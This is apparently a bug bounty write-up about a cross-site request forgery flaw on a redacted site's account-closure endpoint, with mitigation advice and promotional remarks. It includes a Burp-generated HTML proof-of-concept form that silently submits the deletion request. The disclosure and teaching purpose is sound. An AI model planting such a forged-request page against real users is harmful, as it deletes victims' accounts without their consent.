CSRF lead to Account Deletion (Critical- Bounty $7500)
Hello, Hunters. I know You are here because you are struggling or want to advance in your career. Believe me, things take time. Be consistent, continue to learn, and never deceive yourself. If you follow these three mantras, you will undoubtedly achieve success.
Target Url: ████/services/user/closeAccount.
Summary: I discovered a major Cross Site Request Forgery vulnerability in the target endpoint on the POST request █████/services/user/closeAccount that can erase an authenticated user account whenever he accesses the attacker’s website or link.
Step-by-step Reproduction Instructions
- Navigate to your account █████████/#/login.
- Copy and paste the below code in an html file.
<html>
<! — CSRF PoC — generated by Burp Suite Professional →
<body>
<script>history.pushState(‘’, ‘’, ‘/’)</script>
<form action=”████████/services/user/closeAccount” method=”POST”>
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>```
Open it in the browser, hit the button and your account will be closed.
Suggested Mitigation/Remediation Actions
Add a csrf-token in the header or in an hidden input to check if the user that is doing this action authorized or not.
Impact
This action is critical and sensitive. Attacker can upload this file to a url. Sends it to the victims. And when the authenticated victims navigate to the url their accounts will be deleted.
Thank you for reading !! hope you get to learn some tricks.
Subscribe to the Shuttlertech YouTube channel for more of this type of content and to watch live POCs & To advance your career connect with me 1:1 over topmate .
I will ensure you that I will write more interesting and knowledge-sharing writeups, to encourage me to follow me on medium and click the clap icon.
Disclaimer: My write-up comes from my own achievements & Some time from different Learning platforms Do not use this methodology without concern for the company. I am just sharing this for learning purposes.
Connect with me For any doubt or guidance